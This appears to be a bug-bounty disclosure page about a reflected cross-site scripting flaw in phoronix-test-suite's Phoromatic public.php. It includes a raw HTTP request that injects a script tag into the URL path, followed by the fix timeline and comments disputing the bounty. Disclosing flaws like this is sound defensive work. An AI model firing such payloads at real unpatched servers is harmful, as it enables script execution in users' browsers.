Cross-site Scripting ( XSS) - Reflected in phoronix-test-suite/phoronix-test-suite


Reported on

Jun 23rd 2022


Please enter a description of the vulnerability. File pts-core/phoromatic/public_html/public.php line 258 of public.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.

Proof of Concept

GET /test"><script>alert(1)</script> HTTP/1.1
Host: localhost:8670
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=do8d0t932flbqqlmc9tj6hcjdk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache

// PoC.js
var payload = ...



We are processing your report and will contact the phoronix-test-suite team within 24 hours. a year ago
We have contacted a member of the phoronix-test-suite team and are waiting to hear back a year ago
phoronix-test-suite/phoronix-test-suite maintainer modified the Severity from Critical to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability a year ago
trongkykma has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
phoronix-test-suite/phoronix-test-suite maintainer marked this as fixed in v10.8.4 with commit e4ff08 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
a year ago


i am not understanding why i am not getting the bounty?

a year ago


XSS error is not understood how you can rate it low ? @phoronix-test-suite

a year ago

It's just a XSS Reflected bug bro @trongkykma - You need to learn more about the effects of each type of XSS bro :)))))

a year ago

ưhat's up!!!!!

to join this conversation